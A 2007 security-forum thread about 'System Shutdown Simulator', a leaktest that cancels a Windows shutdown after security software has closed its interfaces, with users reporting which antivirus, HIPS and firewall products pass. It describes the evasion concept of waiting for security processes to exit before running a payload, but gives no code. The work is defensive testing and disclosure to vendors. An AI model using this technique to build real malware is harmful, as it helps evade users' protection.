Dear Wilders Community,

As mentioned before I have discovered a simple design issue in Windows that can circumvent the protection of some security software today.

This security tool / leaktest is called System Shutdown Simulator (self-explanatory). It is available for download here:

http://www.geocities.com/zeroday_software/

This leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown. For example, when installing new software, the installation program often asks the user to restart their computer to complete the installation. When the user allows the computer to be restarted, the installation program could potentially compromise the user's computer completely undetected by security software as these have already shutdown.

A selection of Security Vendors were notified on the 12/11/07 (list kindly supplied by gkweb of firewallleaktester.com). SySafety was contacted earlier however, on the 10/11/07.

A response has been received from SoftSphere Technologies (DefenseWall HIPS), SySafety (SSM) and Tall Emu (Online Armor).

If you have any issues please contact me at: zeroday_software@yahoo.com
The latest release is 1.0.20

I don't suppose your tool is been submitted to EQSecurity yet. It sure would do them some good to review their HIPS vulnerability to it so that they might make the neccessary adjustments to protect against it.

Thanks for your interest and research in this.

No, haven't notified EQSecurity. :-\

Does anyone know their email address?

my mistake....
i misunderstood the leaktest!

alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest.

-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-


I had it as an either/or :-\

For those interested, SafeSpace passes the Auto Start Registry Key test when the SSS is run in SafeSpace. Well, thats how I'm reading it :)

-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-
you are wrong...

EDIT:
sorry again...

-{ Quote: "I had it as an either/or :-\
" }-

The windows says "or". However I think that check if your security can intercept a shutdown is not the idea. The idea is check if your security doesn't close too early in a shutdown, leaving the computer unprotected against any application that can cancel the shutdown and deliver a malicious payload.

From SSS:

-{ Quote: "Note: While security programs can detect if an apllication tries to shutdown a computer, in reality, malware could wait for user to shutdown the computer before running a malicious payload to avoid detection." }-

-{ Quote: "195312

195313

ProSecurity 1.40b2" }-
alfa1, u did not understand the test. U need to allow shutdown and then use step 3 to test ur HIPS( PS).

-{ Quote: "you are wrong...
" }-

he/she isn't wrong exactly ....it is either/or :)

-{ Quote: "alfa1, I think you are suposed to shutdown manually from the start menu, not click the shutdown button in the leaktest." }-
It can be either way but u need to allow shutdown prompt by ur HIPS to use the actual leaktest( Step3).

ok, i'm very sorry for my mistake...

I'will try again...:thumbd:

Vert smart Leaktest indeed.:thumb: :thumb: :thumb:

I tested my system:

1- GesWall- Passed - Eicar test file was isolated and autostart reg enetry was virtualized. :thumb:

2- NeovaGuard - Intercepted autostart reg entery creation( I got a skinless prompt as GUI was already terminated). Passed :thumb:

NG however did not intercepted oubound ping as I think its network monitoring componenet has no such filter. Also NG has no file protection so it,s not supposed to intercept Eicar test file creation.

3- EQSecure- totally failed. It intercepted creation of neither Eicar test file nor autostart reg entery. :thumbd:

I did not check Antivir as I am not using it in real time, may try later.

-{ Quote: "ok, i'm very sorry for my mistake...

I'will try again...:thumbd:" }-
No problems. Test is really confusing and tricky:) but very nice indeed.

@aigle

you are using geswall 2.7 beta right? did you try it vs the shutdown attempt. because i still use 2.6 and it failed the shutdown part of the test.

edit : geswall stops the machine from being restarted BUT all the program icons near the system clock disappear. even with them gone, geswall still stopped the program from creating a registry entry and the eicar file was indeed created isolated. i just don't get where my icons went ;)

ok....

now i can show you the last pic (sorry again....):

195320

zopzop! i am using 2.7 beta. Test is not about shutdown indeed. Test even doesn,t shutdown ur system completely. It just shutdown the system to the extent that all security software are turned off( Step 1 and 2). It,s at that time that the leaktest simlates some malicious actions( Step3).

Step 2 shutdown is not the real test. It,s my understanding of the test.

Indeed if some HIPS somehow will not allow step 2( partial system shutdown), there is no way to test that HIPS against this leaktest. Correct me if I am wrong.

-{ Quote: "ok....

now i can show you the last pic (sorry again....):

195320" }-
What about file creation and outbound ping? PS has file protection and network access modules as I know.

-{ Quote: "@aigle

you are using geswall 2.7 beta right? did you try it vs the shutdown attempt. because i still use 2.6 and it failed the shutdown part of the test.

edit : geswall stops the machine from being restarted BUT all the program icons near the system clock disappear. even with them gone, geswall still stopped the program from creating a registry entry and the eicar file was indeed created isolated. i just don't get where my icons went ;)" }-

Hi zopzop

The tray icons disappearing are part of the test as I understand it.

Like a fake shutdown but in reality it should close the GUI and you should see the service running in Task Manager.

This I can confirm with Online Armor and SafeSpace. You will find Returnil shut down completely but no major issue as it will reboot with no changes assuming you were in Session Lock.

Need to check again now I can find Eicar file whether it is in fact running in SafeSpace.

-{ Quote: "What about file creation and outbound ping? PS has file protection and network access modules as I know." }-

195324

195325

-{ Quote: "zopzop! i am using 2.7 beta. Test is not about shutdown indeed. Test even doesn,t shutdown ur system completely. It just shutdown the system to the extent that all security software are turned off( Step 1 and 2). It,s at that time that the leaktest simlates some malicious actions( Step3).

Step 2 shutdown is not the real test. It,s my understanding of the test.

Indeed if some HIPS somehow will not allow step 2( partial system shutdown), there is no way to test that HIPS against this leaktest. Correct me if I am wrong." }-

ah i get it now :) then i can confirm geswall 2.6 passes this test, since the registry entry was virtualized and eicar file was isolated.

Anyone tried:

DefenceWall
ThreatFire

-{ Quote: "195324

195325" }-
Thanks

Hi

Like Geswall, SafeSpace isolates Eicar file when SSS run in SafeSpace so I guess thats a pass as well :thumb:

Hello,

I'm mirroring the file, with dmenace's agreement :
http://www.firewallleaktester.com/mirror/zeroday_software/sss.htm

Regards,
gkweb.

Has anyone tested Sandboxie??

Running sandboxed within Vista.

Eicar and Autostart creation both state "successful - fail" and are contained to the sandbox.

Shutdown test is unsuccessful with sandboxie showing the below top message.

The ping test seems unsuccessful in Sandboxie/Vista but seems to get through with Sandboxie/XP when SB is configured to stop outbounds.
195330
Error message when attempting the ping test SB/Vista.
195331
Quote a fellow poster, Mitch, over at SB's forum on the ping test in XP.
I'm just not quite sure on this test though - I pinged myself, I pinged no address and I pinged xxx.xx.xx.xx and each time it said I failed. Hmmm....

@Denis: Well-designed exploit/leak test (& for adding another attack vector for the script-kiddies... ;D.)


Anti-Executable (2.20.0255): Passed (So it won´t work as a runtime executable.)

Eicar-test:
Online Armor (2.1.0.31): Passed (Showing an Allow/Block prompt when trying both write and execute.)
Avast (4.7.1074): Failed
AVG AS (7.5.1.43): Failed

Autostart-test:
Online Armor (2.1.0.31): Passed
DefenceWall (2.09): Passed
ThreatFire (3.0.8 ): Failed
WinPatrol (12.2.2007): Failed (Intercepted the autostart change after reboot, but then it would be to late.)
Limited User Account: Failed (Its purpose isn´t to prevent programs from running/autostart, its purpose is to prevent malware from doing too much harm without an extra privilege elevation. But if you don't want the user-specific autorun entry, you can disable it either directly in the regeditor or by group policy.)

Leak-test:
Didn´t run this test since I don´t use an outbound filter.

-{ Quote: "...When it comes to security, there’s no single cure all and every layer of protection you add could be the one that eventually saves you or your computer. (Mark Russinovich, Sysinternals.com/Blog)" }-

/C.

A beautiful piece of work by the designer...

Using Windows XP SP2, here's my findings:

1) Eicar creation: Kaspersky Anti Virus 7 - Failed to detect

2) Autorun key creation: EITHER ProSecurity 1.4PB2 blocked it, OR Limited User Account blocked it. I'm inclined to think Limited User Account because ProSecurity failed test 3

3) Ping-test:
Outpost 4 (Latest build): failed (hmm, 30 mins later and not at my computer, I'm thinking maybe I've globally allowed pings out with Outpost). ProSecurity 1.4PB2 failed.

Damn, how demoralizing....:lurking:

-{ Quote: "A beautiful piece of work by the designer...
" }-
So why and or where is it pinging if you leave the address field blank????

-{ Quote: "So why and or where is it pinging if you leave the address field blank????" }-
Sorry Franklin, you lost me?

I left the ping field with the default IP SSS.exe uses... It said it got a response no problem.

What I meant above was that I think I have allowed any program to ping anywhere in my firewall setup, so I don't think I really tested Outpost 4 properly.

Still, maybe I did and it doesn't block all network activity during shutdown.

-{ Quote: "So why and or where is it pinging if you leave the address field blank????" }-

Sorry Franklin, Thats a bug that I'll fix in Version 1.21. Because this is a one-man operation, I haven't had the time to do extensive testing. :(

-{ Quote: "A beautiful piece of work by the designer..." }-

Thanks Stephen, its good to know that its useful... :)

To clarify on the shutdown question earlier, you should shutdown your computer manually from the start menu. The shutdown button has been left there for convenience but like I said your HIPS would probably detect that...

-{ Quote: "Hello,

I'm mirroring the file, with dmenace's agreement :
http://www.firewallleaktester.com/mi...ftware/sss.htm

Regards,
gkweb." }-

Thanks gkweb for all your time and help :thumb: :thumb: :thumb: :thumb: :thumb:

-{ Quote: "Error message when attempting the ping test SB/Vista.

Quote a fellow poster over at SB's forum on the ping test in XP.
I'm just not quite sure on this test though - I pinged myself, I pinged no address and I pinged xxx.xx.xx.xx and each time it said I failed. Hmmm..." }-

Franklin, sorry for the confusion. :ouch:

By default SSS is configured to ping www.yahoo.com

If you ping yourself, (127.0.0.1) it will probably succeed (ie it will say firewall fails). This is ok, and not a fault of the firewall as loopback connections are not accessible to outsiders and thus usually allowed by firewalls (Correct me if I'm wrong)

If you ping another IP address like the default one, and it fails then you have a problem.

I haven't tested this in Vista so it'll be hard to replicate that error message. If the firewall test component doesn't work in Sandboxie, I'll try to contact Tzuk. Otherwise I'll have to rewrite SSS to not use pings and instead send a TCP packet. :wacko:

Does anyone know eqsecure's email?

Thanks for the reply dmenace.:)

-{ Quote: "Does anyone know eqsecure's email?" }-support[at]eqsecure.com
but I never got a reply from them. Solcroft can help u to convey ur message to them.

-{ Quote: "
Shutdown test is unsuccessful with sandboxie showing the below top message.
" }-Seems somehow u misunderstood it. There is no shutdown test. While testing any sandbox, u must use normal shutdown button instead of shutdown via leaktest. System will be shutdown partially, then try step 3 that is actual leak test and see the results.

dmenace, if you have time you may want to visit the link below.

http://www.sandboxie.com/phpbb/viewtopic.php?t=2443

@ aigle, will give it another run.

Yep, the test did prevent Vista from shutting down!

The app has to be left running in order for this to happen with Sandboxie showing there is an active process still running if hidden.

A suggestion for next version: Replace the ping test with TCP. For example download some harmless text file or upload some text written by the user.
Currently the leaktest is not only testing whether the firewall is working or not but also the ability of the firewall to block outbound pings with current rules. Many firewalls (e.g. Kerio 2.15) doesn't allow application rules for ICMP, only global rules.

-{ Quote: "Seems somehow u misunderstood it. There is no shutdown test. While testing any sandbox, u must use normal shutdown button instead of shutdown via leaktest. System will be shutdown partially, then try step 3 that is actual leak test and see the results." }-

The creator of this should explain things alot more clearly before people start calling this such a great test. instead of just throwing a post about it on other forums... Only causing confusion and not just by me obviously.

It seems pretty straight forward. I've made a few pics to: confirm I'm running it correctly. Help anyone who may be confused.

First step: Open SSS and click on "Intercept System shutdown call".
195332

Second Step: Shutdown/Restart PC through Start menu (avoiding any interception of the Shutdown command by a HIPS program)
195333
195334
195335

After this is done the GUIs of your programs will shutdown, and Systray icons will disappear.
195336

Whether their services are running, and they will be effective remains to be seen.
Will continue.

Step three: Run the tests (Eicar, Auto Start Registry Key, Outbound Connection) and check results
195337
195338
195339

Pass or fail, you can now clean up the Eicar and registry entries (if the Reg test ended in a fail) and close SSS
195342
195341

Then just restart your PC.

So, is that it? Hope this can help.

@boonie: Which security programs did you test?

Edit: Sorry, missed the programs in your sig.

/C.

NOD32 and Online Armor (Paid)
Should be noted that I have Allow Echo Request in OA's firewall unchecked (default is allow).

OK. I Had done it correctly for the apps I had on at the time... I think. Avira antivirus passed without any other protection. While I had comodo 3 on, pretty sure it passed the firewall part even with a global rule as long as you dont give all permissions to this app. Blows by windows firewall (XP) only to be stopped by el cheapo router. This ICMP going out from router is totally unecessary to be enabled: right ? Havent looked at other apps yet.

-{ Quote: "The creator of this should explain things alot more clearly before people start calling this such a great test. instead of just throwing a post about it on other forums... Only causing confusion and not just by me obviously." }-

My apologies to Eh_Greg and anyone else who is confused.

Big thanks to Boonie for their excellent explanation. It is a completely correct understanding. The actual test is at step 3 where you can see if you pass/fail.

I've released 1.0.21 to fix a possible bug with the ping results.

-{ Quote: "NOD32 and Online Armor (Paid)
Should be noted that I have Allow Echo Request in OA's firewall unchecked (default is allow)." }-

Good to see those passed. The confusion wasn't really how to run the test on this end. Was just the apps I was looking at during testing, and some Sandboxie confusion it seemed. SSS seemed to hang a couple times and took about a minute to clear the systray.

Greg

Quote Tzuk, the author of Sandboxie:
-{ Quote: "Furthermore running PING in a sandboxed command prompt in a sandbox where only IEXPLORE is allowed to use the Internet also works. Finally, running a Sandboxie trace during PING reveals that no access is made to any of those Afd/Tcp/Udp/RawIp resources.

Even if the SSS process gets a chance to do something during shutdown, it's still trapped in the sandbox. The Sandboxie driver does not stop monitoring processes during shutdown processing." }-

Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323

Hello,

-{ Quote: "
Thanks gkweb for all your time and help :thumb: :thumb: :thumb: :thumb: :thumb:" }-

You are welcome :) Thanks to you for your great tool ;)

Regards,
gkweb.

Has anyone tried Comodo v3 against it?

Thanks

Good old Sygate :o and avira free passed. Threatfire did nonting. Got no other HIPS.

Cheers.

-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hi MitchE323, and welcome to the forum. Try the "search" function if there's anything particular you're looking for. Quite a few SandboxIE threads (and fans) here

-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hey right back at ya man, i've seen you over at Sandboxie before and now I run into you again, over here!:P
Anyways though, Happy Thanksgiving to everyone else as well!

-{ Quote: "Hello everyone, thought I would register and say Happy Thanksgiving to everybody since Franklin mentioned a thread over at SandboxIE that coincides with this thread. Very interesting program indeed dmenace, keep up the good work. Anyone that hasn't visited SandboxIE as yet are of course very welcome, it's a pretty fun setup over there. (I'm not connected in any way, just a frequent poster). I'll lurk around a little bit here and see what I can learn. I am of the 'less is more' philosophy when it comes to computer security, but there is merit in many different approaches. Anyway, hope everyone stays happy and safe this holiday. C ya.
mitche323" }-
Hi Mitch and welcome to Wilders.;)

Have picked up many good tips on Sandboxie from MitchE323 over at SB's forum.:thumb:

Hello,
Interesting to see all the responses!

Regarding the results of SSS, when I released it I expected most software to pass and only some poorly written software to fail.

However what surprised me was that software like Avast AV, System Safety Monitor, Eqsecure, KIS 7 and Comodo 3 RC1 (Not current release) all FAILED!

I've also released the new version as mentioned (1.0.21) that fixes an issue with the ping results being misleading in some cases.

Regarding Sandboxie, it isn't a firewall so you can't expect it to block the outgoing ping. Sandboxie does isolate the eicar file and auto start key so it passes as a sandbox. :thumb:

Version 1.1 should hopefully use TCP instead of ping for more accurate results.

-{ Quote: "However what surprised me was that software like Avast AV..[snip] all FAILED!
" }-

That's an invalid assumption, as a matter of fact.

No, it´s not an invalid assumption since it was me that tested it, and I followed the instructions accordingly. Test it yourself then if you think I´ve done it wrongly.

/C.

Actually, I've tested avast in a virtual machine too and it failed.
However I haven't / wont do anymore testing. Other results above supplied kindly by gkweb and others.

dmenace, Forgive me as I am slightly late to the party here and I am trying to get a handle on the entire concept of your program. In your opening post you state that "this leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown." So if I've got it right, you shut down your computer and all of your running processes begin to close. Some or all of your security programs are shutting down. During this time, another program cancels that shutdown (to Windows only), and one by one all of your running processes completely close. Now you are completely exposed to anything that program wants to do on your computer. Also I imagine that all of this could probably be setup as to happen almost instantly so you would never even notice it. That's a remarkable discovery on your part.

It occurs to me that a completely valid question to any supplier of any security product would be; "Does your program stop monitoring at any time during the shutdown process?" If it does, it is potentially vulnerable. Tzuk has stated over at SandboxIE that his program does not stop monitoring during the shutdown process. It seems an easy enough question for the developer to simply answer.

This could almost become a new 'Standard Question' to ask of any security product you are considering. Then, your program kicks in to verify that all are being correct in their answers.

It seems to me, to be more thorough than one by one actually testing programs because in fact the same program might pass or fail depending on whether or not your test was implemented by the user before or after the security program closed. One user might wait 10 seconds before proceeding to step 3 of your test and another might wait 10 minutes. Also in the test the user is controlling the action (via your test) when in reality, it would be a piece of malware that was determining when to issue the 'Cancel Shutdown' order and when to issue the 'Destroy Computer' order.

You are bound to get a bunch of "it failed", "no it didn't", "well, it failed for me too" responses here. The important thing about all of this is that a user whose products passed would be lulled into a false sense of security when in fact his results were part of a random mix.
mitche323

-{ Quote: "No, it´s not an invalid assumption since it was me that tested it, and I followed the instructions accordingly. Test it yourself then if you think I´ve done it wrongly." }-

-{ Quote: "Actually, I've tested avast in a virtual machine too and it failed." }-

I'm not saying the program says it PASSES, but I'm saying that assuming that this means there's some kind of bypass is incorrect.

Let me explain what's going on. The program (SSS) doesn't actually try to execute the file (eicar), all it does is write the file to the hard drive. Now, it all depends on your avast configuration. By default, when avast finds a virus on-write, it only notifies the user (doesn't delete the file automatically). Since its GUI component is already killed, it doesn't display the popup and nothing really happens. However, no malicious code is executed, of course. You can try running the eicar, you'll see that it will be blocked.

Also, if you're not happy with that behavior, you can change it. In the Standard Shield's settings, just enable Silent Mode (-> with anwer "No") and this will cause all malware samples written to the hard drive to be automatically moved to the quarantine.


Cheers
Vlk

Nice to know that Avast doesn,t fail in reality.

dmenace! I think it wil be nice to add execution of Eicar test file as well to the leakests.

-{ Quote: "dmenace, Forgive me as I am slightly late to the party here and I am trying to get a handle on the entire concept of your program. " }-
No worries. A long read I guess...

-{ Quote: "In your opening post you state that "this leaktest highlights a new vulnerability that exists when a user shuts down their computer and a program cancels the shutdown." So if I've got it right, you shut down your computer and all of your running processes begin to close. Some or all of your security programs are shutting down. During this time, another program cancels that shutdown (to Windows only), and one by one all of your running processes completely close. " }-

Not all the processes close. If the process is running at a kernel-level with a driver it should still work even without a GUI.

-{ Quote: "It occurs to me that a completely valid question to any supplier of any security product would be; "Does your program stop monitoring at any time during the shutdown process?" If it does, it is potentially vulnerable.
This could almost become a new 'Standard Question' to ask of any security product you are considering. Then, your program kicks in to verify that all are being correct in their answers. " }-
Yes you could ask that question. However obviously every security product has to shutdown eventually so its incorrect to ask "at any time". Maybe ask "while windows is shutting down / booting".
Software firewall vendors are usually most asked this question.

-{ Quote: "It seems to me, to be more thorough than one by one actually testing programs because in fact the same program might pass or fail depending on whether or not your test was implemented by the user before or after the security program closed. One user might wait 10 seconds before proceeding to step 3 of your test and another might wait 10 minutes. Also in the test the user is controlling the action (via your test) when in reality, it would be a piece of malware that was determining when to issue the 'Cancel Shutdown' order and when to issue the 'Destroy Computer' order." }-

Yes I understand there is this time issue that may affect results. Usually I just wait till all the tray icons vanish when I run the test.

In reality, the "cancel shutdown" would work straight away when test is run as it hooks the windows api. Then when the user shuts down the computer this would be detected. A malicious payload would be executed when for example, it detects that certain processes have shutdown or only windows processes remain.

-{ Quote: "You are bound to get a bunch of "it failed", "no it didn't", "well, it failed for me too" responses here. The important thing about all of this is that a user whose products passed would be lulled into a false sense of security when in fact his results were part of a random mix.
mitche323" }-

Yes I agree there could be a false sense of security. So I would have to point that out more - that you have to wait. I suggest if you are confused simply repeat the test (step 3) again after say a minute.

Phew! :wacko: No more questions! :ouch: :D
BTW welcome to wilders mitch.

EDIT: So it makes sense

-{ Quote: "
dmenace! I think it wil be nice to add execution of Eicar test file as well to the leakests." }-

Easy for you to say but this is a one man operation... with no rewards (ie freeware) so obviously I cant do everything:

1) how to detect if eicar successfully executed???

>>> have to scan running processes ughh!

Sorry I shouldn't be complaining and I'll do what I can. But geez I am a bit overwhelmed ~ its a leaktest not a security app. :( :gack: :gack: :gack:

The concept is there. You can always run your own payload.

Edited

Spot on dmenace! Thanx for the totally informative and quick answer - I'm caught up now. lol :D

-{ Quote: "Easy for you to say but this is a one man operation... with no rewards (ie freeware) so obviously I cant do everything:" }-I agree.
-{ Quote: "Sorry I shouldn't be complaining and I'll do what I can. But geez I am a bit overwhelmed ~ its a leaktest not a security app. :( :gack: :gack: :gack:" }-
I can understand ur situition. Take it easy. U r not bound to do anything. It,s still a smart leaktest as it is.;D

-{ Quote: "It's still a smart leaktest as it is.;D" }-
I agree, and it's still beta! Looks like a good candidate for 'DonationWare'

-{ Quote: "1) how to detect if eicar successfully executed

>>> have to scan running processes ughh!" }-

All you have to do is check whether the process creation API succeeded or failed (usually, it fails with Access Denied error code if an AV is blocking the file).

@vlk: Running in a LUA I did a new test with Avast (latest version), and followed your instructions accordingly regarding Avast:s settings. But it still writes eicar.com to the harddrive and I can also execute the file, it will not be blocked. Am I missing something here, since it doesn´t correlate with your prediction/test?

/C.

Haven´t done any testing myself yet, but just wanted to congratulate dmenace with this nice new testing tool, sure looks interesting. ;)

Has anyone notified about it on TF forums and CFP forums( I think both failed to this test)?

Thanks

-{ Quote: "Has anyone notified about it on TF forums and CFP forums( I think both failed to this test)?

Thanks" }-
Anyone please!

Last time I checked, the "firewall" part of the test passed with flying colors. Maybe there was an issue with the registry part. I don't consider the eicar file a valid test just for CFP alone. Perhaps Dmenace or Endangered Frog knows the answers if there has been a new version of the test released. 8)

-{ Quote: "Has anyone tried Comodo v3 against it?

Thanks" }-

I've tested it. My AV caught the EICAR,
HIPS and FW caught by V3 ( 288 ).

Previous CFP V3 had a missing protected reg key default that caused it not to pass the test.

Under Automatic Startup Group
*\Software\Microsoft\Windows\CurrentVersion\Run*

If it is not there, then add it.

Al

Yahoo has sadly shutdown Zeroday Software's website because apparently any linking to external websites is banned.

As a result if anyone still wants to download System Shutdown Simulator please get it here:

http://www.firewallleaktester.com/mirror/zeroday_software/sss.htm

I've paused development on SSS as I am busy at the moment. May later implement TCP instead of ping. But its pretty much complete and bug free now anyway.

The latest release is 1.0.21 The website issue will be fixed at a later date.

Hello,

Sorry to hear your problems :-\

Previously I was pointing to your website for download. However because of the context and per your asking, I am hosting the binary as well, which is available from now.

Regards,
gkweb.

Noble and sharp effort on your part dmenace and a great catch, also thanks are due to gkweb for hosting it.

I'm sure as time passes other keylog vulnerabilities are bound to surface again but nice to know we theres always a global pool of attentitive minds that are around-the-clock scrutinizing for every piece of a potential exploit.

Hi!
tested with ZA Security Suite 7.0462.000 and all tests are passed ;)

Cheers,
Fax

I have moved ZeroDay Software to another web hosting company; "Free Web Hosting Area" and to a new web address at http://zeroday-software.freetzi.com/. I apologise for any inconvenience caused.

Due to this change there will be several broken links.

A new version of System Shutdown Simulator (1.0.22) has also been released with the updated web address.

Lets hope that this web host will last longer than the previous one!

Hopefully gkweb can continue to mirror SSS (even the old 1.0.21) as I lack confidence with this free web host. If you have trouble with viewing page / downloading SSS ensure you allow referrer and ad blocking off.

Many thanks,
dmenace.

I usually delete this visual basic file so in my case this is no threat.. ;D ;D ;D ;D ;D ;D ;D Dependency Malware is weak.